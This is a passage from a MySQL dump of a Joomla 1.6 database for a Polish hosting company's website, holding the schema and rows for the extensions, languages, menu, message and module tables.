00:00:00',0,0),(10003,'pl-PL','package','pkg_pl-PL','',0,1,1,0,'{\"legacy\":false,\"name\":\"Polski pakiet j\\u0119zykowy\",\"type\":\"package\",\"creationDate\":\"Unknown\",\"author\":\"Unknown\",\"copyright\":\"\",\"authorEmail\":\"\",\"authorUrl\":\"\",\"version\":\"1.6\",\"description\":\"Polski pakiet j\\u0119zykowy dla Joomla! 1.6\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10004,'Freshmail Subscription','module','mod_freshmail','',0,1,0,0,'{\"legacy\":false,\"name\":\"Freshmail Subscription\",\"type\":\"module\",\"creationDate\":\"2011-11-01\",\"author\":\"FreshMail.pl \\/ Micha\\u0142 Bia\\u0142as\",\"copyright\":\"All rights reserved by Freshmail.pl 2011\",\"authorEmail\":\"michal.bialas@freshmail.pl\",\"authorUrl\":\"freshmail.pl\",\"version\":\"0.1.0\",\"description\":\"Modu\\u0142 zapisu do newslettera w systemie FreshMail\",\"group\":\"\"}','{\"FMlogin\":\"\",\"FMpassword\":\"\",\"FMsubscribersListHash\":\"\",\"FMshowName\":\"0\",\"FMcustomField1\":\"\",\"FMcustomFieldName1\":\"\",\"FMcustomField2\":\"\",\"FMcustomFieldName2\":\"\",\"FMcustomField3\":\"\",\"FMcustomFieldName3\":\"\"}','','',0,'0000-00-00 00:00:00',0,0); /*!40000 ALTER TABLE `jos_extensions` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_languages` -- DROP TABLE IF EXISTS `jos_languages`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_languages` ( `lang_id` int(11) unsigned NOT NULL auto_increment, `lang_code` char(7) NOT NULL, `title` varchar(50) NOT NULL, `title_native` varchar(50) NOT NULL, `sef` varchar(50) NOT NULL, `image` varchar(50) NOT NULL, `description` varchar(512) NOT NULL, `metakey` text NOT NULL, `metadesc` text NOT NULL, `published` int(11) NOT NULL default '0', PRIMARY KEY (`lang_id`), UNIQUE KEY `idx_sef` (`sef`) ) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_languages` -- LOCK TABLES `jos_languages` WRITE; /*!40000 ALTER TABLE `jos_languages` DISABLE KEYS */; INSERT INTO `jos_languages` VALUES (1,'en-GB','English (UK)','English (UK)','en','en','','','',1); /*!40000 ALTER TABLE `jos_languages` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_menu` -- DROP TABLE IF EXISTS `jos_menu`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_menu` ( `id` int(11) NOT NULL auto_increment, `menutype` varchar(24) NOT NULL COMMENT 'The type of menu this item belongs to. FK to #__menu_types.menutype', `title` varchar(255) NOT NULL COMMENT 'The display title of the menu item.', `alias` varchar(255) NOT NULL COMMENT 'The SEF alias of the menu item.', `note` varchar(255) NOT NULL default '', `path` varchar(1024) NOT NULL COMMENT 'The computed path of the menu item based on the alias field.', `link` varchar(1024) NOT NULL COMMENT 'The actually link the menu item refers to.', `type` varchar(16) NOT NULL COMMENT 'The type of link: Component, URL, Alias, Separator', `published` tinyint(4) NOT NULL default '0' COMMENT 'The published state of the menu link.', `parent_id` int(10) unsigned NOT NULL default '1' COMMENT 'The parent menu item in the menu tree.', `level` int(10) unsigned NOT NULL default '0' COMMENT 'The relative level in the tree.', `component_id` int(10) unsigned NOT NULL default '0' COMMENT 'FK to #__extensions.id', `ordering` int(11) NOT NULL default '0' COMMENT 'The relative ordering of the menu item in the tree.', `checked_out` int(10) unsigned NOT NULL default '0' COMMENT 'FK to #__users.id', `checked_out_time` timestamp NOT NULL default '0000-00-00 00:00:00' COMMENT 'The time the menu item was checked out.', `browserNav` tinyint(4) NOT NULL default '0' COMMENT 'The click behaviour of the link.', `access` tinyint(3) unsigned NOT NULL default '0' COMMENT 'The access level required to view the menu item.', `img` varchar(255) NOT NULL COMMENT 'The image of the menu item.', `template_style_id` int(10) unsigned NOT NULL default '0', `params` text NOT NULL COMMENT 'JSON encoded data for the menu item.', `lft` int(11) NOT NULL default '0' COMMENT 'Nested set lft.', `rgt` int(11) NOT NULL default '0' COMMENT 'Nested set rgt.', `home` tinyint(3) unsigned NOT NULL default '0' COMMENT 'Indicates if this menu item is the home or default page.', `language` char(7) NOT NULL default '', `client_id` tinyint(4) NOT NULL default '0', PRIMARY KEY (`id`), UNIQUE KEY `idx_client_id_parent_id_alias` (`client_id`,`parent_id`,`alias`), KEY `idx_componentid` (`component_id`,`menutype`,`published`,`access`), KEY `idx_menutype` (`menutype`), KEY `idx_left_right` (`lft`,`rgt`), KEY `idx_alias` (`alias`), KEY `idx_path` (`path`(255)), KEY `idx_language` (`language`) ) ENGINE=InnoDB AUTO_INCREMENT=116 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_menu` -- LOCK TABLES `jos_menu` WRITE; /*!40000 ALTER TABLE `jos_menu` DISABLE KEYS */; INSERT INTO `jos_menu` VALUES (1,'','Menu_Item_Root','root','','','','',1,0,0,0,0,0,'0000-00-00 00:00:00',0,0,'',0,'',0,69,0,'*',0),(2,'menu','com_banners','Banners','','Banners','index.php?option=com_banners','component',0,1,1,4,0,0,'0000-00-00 00:00:00',0,0,'class:banners',0,'',1,10,0,'*',1),(3,'menu','com_banners','Banners','','Banners/Banners','index.php?option=com_banners','component',0,2,2,4,0,0,'0000-00-00 00:00:00',0,0,'class:banners',0,'',2,3,0,'*',1),(4,'menu','com_banners_categories','Categories','','Banners/Categories','index.php?option=com_categories&extension=com_banners','component',0,2,2,6,0,0,'0000-00-00 00:00:00',0,0,'class:banners-cat',0,'',4,5,0,'*',1),(5,'menu','com_banners_clients','Clients','','Banners/Clients','index.php?option=com_banners&view=clients','component',0,2,2,4,0,0,'0000-00-00 00:00:00',0,0,'class:banners-clients',0,'',6,7,0,'*',1),(6,'menu','com_banners_tracks','Tracks','','Banners/Tracks','index.php?option=com_banners&view=tracks','component',0,2,2,4,0,0,'0000-00-00 00:00:00',0,0,'class:banners-tracks',0,'',8,9,0,'*',1),(7,'menu','com_contact','Contacts','','Contacts','index.php?option=com_contact','component',0,1,1,8,0,0,'0000-00-00 00:00:00',0,0,'class:contact',0,'',11,16,0,'*',1),(8,'menu','com_contact','Contacts','','Contacts/Contacts','index.php?option=com_contact','component',0,7,2,8,0,0,'0000-00-00 00:00:00',0,0,'class:contact',0,'',12,13,0,'*',1),(9,'menu','com_contact_categories','Categories','','Contacts/Categories','index.php?option=com_categories&extension=com_contact','component',0,7,2,6,0,0,'0000-00-00 00:00:00',0,0,'class:contact-cat',0,'',14,15,0,'*',1),(10,'menu','com_messages','Messaging','','Messaging','index.php?option=com_messages','component',0,1,1,15,0,0,'0000-00-00 00:00:00',0,0,'class:messages',0,'',17,22,0,'*',1),(11,'menu','com_messages_add','New Private Message','','Messaging/New Private Message','index.php?option=com_messages&task=message.add','component',0,10,2,15,0,0,'0000-00-00 00:00:00',0,0,'class:messages-add',0,'',18,19,0,'*',1),(12,'menu','com_messages_read','Read Private Message','','Messaging/Read Private Message','index.php?option=com_messages','component',0,10,2,15,0,0,'0000-00-00 00:00:00',0,0,'class:messages-read',0,'',20,21,0,'*',1),(13,'menu','com_newsfeeds','News Feeds','','News Feeds','index.php?option=com_newsfeeds','component',0,1,1,17,0,0,'0000-00-00 00:00:00',0,0,'class:newsfeeds',0,'',23,28,0,'*',1),(14,'menu','com_newsfeeds_feeds','Feeds','','News Feeds/Feeds','index.php?option=com_newsfeeds','component',0,13,2,17,0,0,'0000-00-00 00:00:00',0,0,'class:newsfeeds',0,'',24,25,0,'*',1),(15,'menu','com_newsfeeds_categories','Categories','','News Feeds/Categories','index.php?option=com_categories&extension=com_newsfeeds','component',0,13,2,6,0,0,'0000-00-00 00:00:00',0,0,'class:newsfeeds-cat',0,'',26,27,0,'*',1),(16,'menu','com_redirect','Redirect','','Redirect','index.php?option=com_redirect','component',0,1,1,24,0,0,'0000-00-00 00:00:00',0,0,'class:redirect',0,'',37,38,0,'*',1),(17,'menu','com_search','Search','','Search','index.php?option=com_search','component',0,1,1,19,0,0,'0000-00-00 00:00:00',0,0,'class:search',0,'',29,30,0,'*',1),(18,'menu','com_weblinks','Weblinks','','Weblinks','index.php?option=com_weblinks','component',0,1,1,21,0,0,'0000-00-00 00:00:00',0,0,'class:weblinks',0,'',31,36,0,'*',1),(19,'menu','com_weblinks_links','Links','','Weblinks/Links','index.php?option=com_weblinks','component',0,18,2,21,0,0,'0000-00-00 00:00:00',0,0,'class:weblinks',0,'',32,33,0,'*',1),(20,'menu','com_weblinks_categories','Categories','','Weblinks/Categories','index.php?option=com_categories&extension=com_weblinks','component',0,18,2,6,0,0,'0000-00-00 00:00:00',0,0,'class:weblinks-cat',0,'',34,35,0,'*',1),(101,'mainmenu','Internet i24','home','','home','index.php?option=com_content&view=featured','component',1,1,1,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"layout_type\":\"blog\",\"num_leading_articles\":\"1\",\"num_intro_articles\":\"3\",\"num_columns\":\"3\",\"num_links\":\"0\",\"multi_column_order\":\"1\",\"orderby_pri\":\"\",\"orderby_sec\":\"front\",\"order_date\":\"\",\"show_pagination\":\"2\",\"show_pagination_results\":\"1\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"1\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"Webvisor Sp. z o.o. - hosting i projektowanie stron internetowych\",\"show_page_heading\":1,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',39,40,1,'*',0),(102,'menu-top','Start','2011-07-13-12-53-13','','2011-07-13-12-53-13','/','url',1,1,1,0,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"Strona g\\u0142\\u00f3wna\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1}',41,42,0,'*',0),(103,'menu-top','Internet','2011-07-14-06-48-47','','2011-07-14-06-48-47','http://i24.pl','url',1,1,1,0,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"Intetrnet\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1}',43,44,0,'*',0),(104,'menu-top','Hosting','hosting','','hosting','index.php?option=com_content&view=article&id=5','component',1,1,1,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"menu-anchor_title\":\"Hosting\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',47,48,0,'*',0),(105,'menu-top','Strony WWW','2011-07-14-06-49-31','','2011-07-14-06-49-31','http://www.wytworniastron.pl','url',1,1,1,0,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"Strony WWW\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1}',45,46,0,'*',0),(106,'menu-top','Kontakt','kontakt','','kontakt','index.php?option=com_content&view=article&id=6','component',1,1,1,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"menu-anchor_title\":\"Kontakt\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',51,52,0,'*',0),(107,'menu-top','Poczta','2011-07-14-06-50-42','','2011-07-14-06-50-42','https://mail.i24.pl/','url',1,1,1,0,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"Logowanie do poczty\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1}',53,54,0,'*',0),(108,'menu-top','BOK','2011-07-14-06-51-35','','2011-07-14-06-51-35','https://www.i24.pl/hosting','url',1,1,1,0,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"Biuro Obs\\u0142ugi Klienta\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1}',55,56,0,'*',0),(109,'menu-top','Streaming','2011-12-13-15-09-53','','2011-12-13-15-09-53','http://live24.pro/','url',1,1,1,0,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1}',49,50,0,'*',0),(110,'menu-top','Polityka prywatności','polityka-prywatnosci','','polityka-prywatnosci','index.php?option=com_content&view=article&id=8','component',1,1,1,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',57,58,0,'*',0),(111,'mainmenu','Jak wyłączyć cookies?','jak-wylaczyc-cookies','','jak-wylaczyc-cookies','index.php?option=com_content&view=article&id=9','component',1,1,1,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',59,60,0,'*',0),(112,'menu-top','Kariera','kariera','','kariera','index.php?option=com_content&view=category&id=8','component',1,1,1,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"page_subheading\":\"\",\"show_pagination_limit\":\"\",\"filter_field\":\"\",\"show_headings\":\"\",\"list_show_date\":\"\",\"date_format\":\"\",\"list_show_hits\":\"\",\"list_show_author\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"display_num\":\"10\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',61,62,0,'*',0),(113,'mainmenu','Błąd 404','error-404','','error-404','index.php?option=com_content&view=article&id=15','component',1,1,1,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',63,64,0,'*',0),(114,'menu-top','Pomoc','pomoc','','pomoc','index.php?option=com_content&view=article&id=15','component',-2,1,1,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',65,66,0,'*',0),(115,'menu-top','Pomoc','kariera-2','','kariera-2','index.php?option=com_content&view=category&id=8','component',-2,1,1,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"page_subheading\":\"\",\"show_pagination_limit\":\"\",\"filter_field\":\"\",\"show_headings\":\"\",\"list_show_date\":\"\",\"date_format\":\"\",\"list_show_hits\":\"\",\"list_show_author\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"display_num\":\"10\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',67,68,0,'*',0); /*!40000 ALTER TABLE `jos_menu` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_menu_types` -- DROP TABLE IF EXISTS `jos_menu_types`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_menu_types` ( `id` int(10) unsigned NOT NULL auto_increment, `menutype` varchar(24) NOT NULL, `title` varchar(48) NOT NULL, `description` varchar(255) NOT NULL default '', PRIMARY KEY (`id`), UNIQUE KEY `idx_menutype` (`menutype`) ) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_menu_types` -- LOCK TABLES `jos_menu_types` WRITE; /*!40000 ALTER TABLE `jos_menu_types` DISABLE KEYS */; INSERT INTO `jos_menu_types` VALUES (1,'mainmenu','Main Menu','The main menu for the site'),(2,'menu-top','menu-top','menu główne'),(3,'gfsd','gfhyds',''); /*!40000 ALTER TABLE `jos_menu_types` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_messages` -- DROP TABLE IF EXISTS `jos_messages`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_messages` ( `message_id` int(10) unsigned NOT NULL auto_increment, `user_id_from` int(10) unsigned NOT NULL default '0', `user_id_to` int(10) unsigned NOT NULL default '0', `folder_id` tinyint(3) unsigned NOT NULL default '0', `date_time` datetime NOT NULL default '0000-00-00 00:00:00', `state` tinyint(1) NOT NULL default '0', `priority` tinyint(1) unsigned NOT NULL default '0', `subject` varchar(255) NOT NULL default '', `message` text NOT NULL, PRIMARY KEY (`message_id`), KEY `useridto_state` (`user_id_to`,`state`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_messages` -- LOCK TABLES `jos_messages` WRITE; /*!40000 ALTER TABLE `jos_messages` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_messages` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_messages_cfg` -- DROP TABLE IF EXISTS `jos_messages_cfg`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_messages_cfg` ( `user_id` int(10) unsigned NOT NULL default '0', `cfg_name` varchar(100) NOT NULL default '', `cfg_value` varchar(255) NOT NULL default '', UNIQUE KEY `idx_user_var_name` (`user_id`,`cfg_name`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_messages_cfg` -- LOCK TABLES `jos_messages_cfg` WRITE; /*!40000 ALTER TABLE `jos_messages_cfg` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_messages_cfg` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_modules` -- DROP TABLE IF EXISTS `jos_modules`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_modules` ( `id` int(11) NOT NULL auto_increment, `title` varchar(100) NOT NULL default '', `note` varchar(255) NOT NULL default '', `content` text NOT NULL, `ordering` int(11) NOT NULL default '0', `position` varchar(50) default NULL, `checked_out` int(10) unsigned NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `publish_up` datetime NOT NULL default '0000-00-00 00:00:00', `publish_down` datetime NOT NULL default '0000-00-00 00:00:00', `published` tinyint(1) NOT NULL default '0', `module` varchar(50) default NULL, `access` tinyint(3) unsigned NOT NULL default '0', `showtitle` tinyint(3) unsigned NOT NULL default '1', `params` text NOT NULL, `client_id` tinyint(4) NOT NULL default '0', `language` char(7) NOT NULL, PRIMARY KEY (`id`), KEY `published` (`published`,`access`), KEY `newsfeeds` (`module`,`published`), KEY `idx_language` (`language`) ) ENGINE=InnoDB AUTO_INCREMENT=29 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_modules` -- LOCK TABLES `jos_modules` WRITE; /*!40000 ALTER TABLE `jos_modules` DISABLE KEYS */; INSERT INTO `jos_modules` VALUES (1,'Main Menu','','',1,'position-7',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_menu',1,1,'{\"menutype\":\"mainmenu\",\"startLevel\":\"0\",\"endLevel\":\"0\",\"showAllChildren\":\"0\",\"tag_id\":\"\",\"class_sfx\":\"\",\"window_open\":\"\",\"layout\":\"\",\"moduleclass_sfx\":\"_menu\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}',0,'*'),(2,'Login','','',1,'login',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_login',1,1,'',1,'*'),(3,'Popular Articles','','',3,'cpanel',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_popular',3,1,'{\"count\":\"5\",\"catid\":\"\",\"user_id\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\",\"automatic_title\":\"1\"}',1,'*'),(4,'Recently Added Articles','','',4,'cpanel',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_latest',3,1,'{\"count\":\"5\",\"ordering\":\"c_dsc\",\"catid\":\"\",\"user_id\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\",\"automatic_title\":\"1\"}',1,'*'),(6,'Unread Messages','','',1,'header',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_unread',3,1,'',1,'*'),(7,'Online Users','','',2,'header',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_online',3,1,'',1,'*'),(8,'Toolbar','','',1,'toolbar',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_toolbar',3,1,'',1,'*'),(9,'Quick Icons','','',1,'icon',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_quickicon',3,1,'',1,'*'),(10,'Logged-in Users','','',2,'cpanel',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_logged',3,1,'{\"count\":\"5\",\"name\":\"1\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\",\"automatic_title\":\"1\"}',1,'*'),(12,'Admin Menu','','',1,'menu',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_menu',3,1,'{\"layout\":\"\",\"moduleclass_sfx\":\"\",\"shownew\":\"1\",\"showhelp\":\"1\",\"cache\":\"0\"}',1,'*'),(13,'Admin Submenu','','',1,'submenu',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_submenu',3,1,'',1,'*'),(14,'User Status','','',1,'status',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_status',3,1,'',1,'*'),(15,'Title','','',1,'title',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_title',3,1,'',1,'*'),(16,'Login Form','','',7,'position-7',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_login',1,1,'{\"greeting\":\"1\",\"name\":\"0\"}',0,'*'),(17,'Breadcrumbs','','',1,'position-2',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_breadcrumbs',1,1,'{\"moduleclass_sfx\":\"\",\"showHome\":\"1\",\"homeText\":\"Home\",\"showComponent\":\"1\",\"separator\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}',0,'*'),(18,'Banners','','',1,'position-5',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 